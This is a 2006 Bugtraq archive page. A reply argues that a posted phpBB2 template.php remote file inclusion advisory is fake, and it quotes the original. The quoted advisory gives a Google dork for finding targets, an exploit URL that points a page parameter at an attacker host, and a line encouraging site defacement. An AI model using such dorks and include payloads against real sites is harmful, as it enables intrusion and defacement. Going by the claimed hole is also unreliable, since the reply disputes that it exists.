Bugtraq mailing list archives
RE: phpBB2 (template.php) Remote File Inclusion
From: "Scrouaf _" <scrouaf () hotmail com>
Date: Sun, 04 Jun 2006 22:08:42 +0000
Sounds like a fake to me.... 1: template.php is in the /inludes/ subdir 2: it uses no variable $page 3: it does not use the inlude() function at allWhat was your aim ? lauching a massive script kiddy attack that wouldn't work ?
Scrouaf Desert Warrior and Anargeek
From: canberx () linuxmail org To: bugtraq () securityfocus com Subject: phpBB2 (template.php) Remote File Inclusion Date: 3 Jun 2006 10:47:22 -0000 MIME-Version: 1.0Received: from outgoing.securityfocus.com ([205.206.231.27]) by bay0-mc3-f9.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.1830); Sun, 4 Jun 2006 14:39:48 -0700 Received: from outgoing.securityfocus.com by outgoing.securityfocus.com via smtpd (for bay0-mc3-f.bay0.hotmail.com [65.54.244.72]) with ESMTP; Sun, 4 Jun 2006 14:33:09 -0700 Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])by outgoing3.securityfocus.com (Postfix) with QMQPid 65C202388ED; Sun, 4 Jun 2006 13:04:49 -0600 (MDT)Received: (qmail 7295 invoked from network); 3 Jun 2006 10:42:06 -0000 X-Message-Info: LsUYwwHHNt3GZT6E/6tgNQFelM9zTRGWXiSqkWrZQMA= Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm Precedence: bulk List-Id: <bugtraq.list-id.securityfocus.com> List-Post: <mailto:bugtraq () securityfocus com> List-Help: <mailto:bugtraq-help () securityfocus com> List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com> List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com> Delivered-To: mailing list bugtraq () securityfocus com Delivered-To: moderator for bugtraq () securityfocus com X-Mailer: MIME-tools 5.411 (Entity 5.404) Return-Path: bugtraq-return-25664-scrouaf=hotmail.com () securityfocus comX-OriginalArrivalTime: 04 Jun 2006 21:39:48.0437 (UTC) FILETIME=[6741D850:01C6881F]******************************************************************** *Title: *phpBB2 Remote File Include * * *Credit: *Canberx * * *Thanx: *Forewer-Partizan * * *Mail: *canberx () linuxmail org www.canberx.tk * * *Google Dork: *Powered by phpBB © 2001, 2002 phpBB Group * * *Exploit: *www.target.com/[path_to_phpbb]/template.php?page=[attacker] * * ********************************************************************* Plz Don't Hacked site if it already has been defaced :) *********************************************************************
Current thread:
- phpBB2 (template.php) Remote File Inclusion canberx (Jun 04)
- RE: phpBB2 (template.php) Remote File Inclusion Scrouaf _ (Jun 05)
- Re: phpBB2 (template.php) Remote File Inclusion ad () heapoverflow com (Jun 05)
- Re: phpBB2 (template.php) Remote File Inclusion Jessica Hope (Jun 06)
- Re: phpBB2 (template.php) Remote File Inclusion Aaron Klein (Jun 06)
- Re: phpBB2 (template.php) Remote File Inclusion Paul Laudanski (Jun 06)